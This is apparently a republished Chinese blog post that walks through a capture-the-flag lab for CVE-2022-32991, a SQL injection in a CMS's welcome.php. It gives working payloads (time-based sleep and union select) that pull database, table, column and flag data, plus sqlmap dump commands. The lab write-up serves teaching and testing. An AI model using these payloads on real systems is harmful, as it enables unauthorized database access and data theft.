当前位置: 首页 > news >正文

春秋云境:CVE-2022-32991(sql注入)

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

获取登录地址

http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com:80

登录注册

注册成功登录进入注册接口

参数接口一
发现接口参数q http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1

SQL盲注未发现利用点
http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1' or '1'=1

继续下一步 查看接口和参数情况

参数接口二:

q step eid  n t等http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34

注入点判断方式

参数后加'

参数后加'%2b(select*from(select(sleep(20)))a)%2b'

参数后加' union select 1,2,3,4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694%27%20union%20select%201,2,3,4,5--+&n=1&t=34

查询数据库名

n=2' union select 1,2,database(),4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694n=2%27%20union%20select%201,2,database(),4,5--+&n=1&t=34

查看表信息

2' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db3626942%27%20union%20select%201,2,group_concat(table_name),4,5%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+&n=1&t=34

查询表字段信息

' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='ctf' and table_name='flag'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db3626942%27%20union%20select%201,2,group_concat(column_name),4,5%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27--+

 查看flag表中的字段

2' union select 1,2,group_concat(flag),4,5 from flag--+

发现接口参数 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694' union select 1,2,group_concat(flag),4,5

 flag{e5fb9a56-bfce-48cb-a816-77599da3b03a}

burusuite使用 

 burpsuite也是一款强大的漏扫工具,通过爬取接口进行扫描发现 接口是否存在安全隐患,具体使用教程就不说了,看个人习惯

 

sqlmap使用 

 暴库

保存txt文件执行

python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -dbs

爆破表 

python sqlmap.py -r D:/bc1.txt --batch -D "ctf" --tables

爆破表字段 

 python sqlmap.py -r D:/bc1.txt --batch -D "ctf" -T "flag" --columns

爆破具体字段信息

执行--batch -D "ctf" -T "flag" -C "flag" --dump

  flag{e5fb9a56-bfce-48cb-a816-77599da3b03a} 

SQL注入寻找接口,寻找参数, 寻找注入点, 进行sql盲注 ,查看响应结果值, 工具可以使用sqlmap bp进行测试验证 

http://www.lryc.cn/news/250276.html

相关文章:

  • css实现鼠标移入背景图片变灰并浮现文字的效果
  • ES-深入理解倒排索引
  • linux NAT网卡配置static
  • 信奥编程 1168:大整数加法
  • k8s上Pod全自动调度、定向调度、亲和性调度、污点和容忍调度详解
  • C# 动态编译代码并执行
  • nginx配置反向代理及负载均衡
  • 【古月居《ros入门21讲》学习笔记】09_订阅者Subscriber的编程实现
  • Java全栈基础篇--集合
  • Facebook公共主页受限、被封?一文教你排雷解决
  • Day04:每日一题:2661. 找出叠涂元素
  • SpringBoot 整合Redis
  • tensorflow-gpu1.15 + win11 + RTX 4050环境配置
  • jmeter资料
  • 代码随想录算法训练营第三十六天| 435 无重叠区间 763 划分字母区间 56 合并区间
  • 2023-12-01 事业-代号s-引流技巧和营销思路
  • 反转链表的Java实现
  • 2022年1月14日 Go生态洞察:Go 1.18 新教程探索
  • 国内某知名半导体公司:实现虚拟化环境下的文件跨网安全交换
  • 14.Tomcat和HTTP协议-[一篇通]
  • 在线陪诊系统: 医疗科技的崭新前沿
  • MySQL的基础知识
  • 【EI会议征稿】第七届大数据与应用统计国际学术研讨会(ISBDAS 2024)
  • 最轻量级最完整的屏幕适配完全适配各个手机方案
  • IDEA安装python插件并配置
  • 简单的Python烟花代码,跨年了
  • 社区医院儿童疫苗接种管理系统设计与开发
  • Docker下安装Redis
  • 【python笔记】与网络编程相关的知识总结
  • 【libGDX】Mesh立方体贴图(6张图)